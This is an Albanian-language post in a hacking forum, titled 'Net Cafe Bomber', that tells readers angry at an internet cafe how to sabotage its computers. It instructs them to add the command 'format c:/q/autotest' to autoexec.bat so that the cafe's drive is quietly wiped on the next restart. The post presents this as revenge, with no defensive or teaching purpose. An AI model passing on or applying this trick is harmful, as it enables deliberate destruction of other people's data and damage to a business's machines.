ForumForum  PortailPortail  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Net Cafe Bomber He...

Shko poshtë 
AutoriMesazh
CrackerArianiNumri i postimeve : 57
Join date : 17/10/2008

MesazhTitulli: Net Cafe Bomber He...   Fri Oct 17, 2008 7:59 pm

Nese keni inati nje net cafe ather lexo mir

mas pari e hapmi c: e gjejm autoexec.bat
tani e bajm edit me notepad. dhe ja shtojm "format c:/q/autotest"
edhe e bajm njejt save .

dhe del prej interneti tani aj personi i internet cafes kur ti ban restart
komjuteri BooooM....
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Net Cafe Bomber He...
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: (....::::ASG-Crew Panelli i Kontrollit::::....) :: Hacking & Security-
Kërce tek: